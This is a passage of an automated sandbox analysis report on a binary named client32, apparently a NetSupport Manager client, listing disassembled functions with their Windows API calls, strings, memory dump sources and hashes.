                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                                • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                • String ID: QueueUserWorkItem
                                                                                                                • API String ID: 199729137-2469634949
                                                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                • String ID: FlashWindowEx
                                                                                                                • API String ID: 199729137-2859592226
                                                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                                APIs
                                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                • m_hWnd, xrefs: 110010A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 2046328329-2830328467
                                                                                                                • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                • m_hWnd, xrefs: 11001066
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 819365019-2830328467
                                                                                                                • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                APIs
                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                • m_hWnd, xrefs: 110010F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 906220102-2830328467
                                                                                                                • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • m_hWnd, xrefs: 110151B6
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • m_hWnd, xrefs: 11017206
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                                • m_hWnd, xrefs: 11001136
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 1604732272-2830328467
                                                                                                                • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                                • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                                APIs
                                                                                                                • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                                • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                                APIs
                                                                                                                • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                                                • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
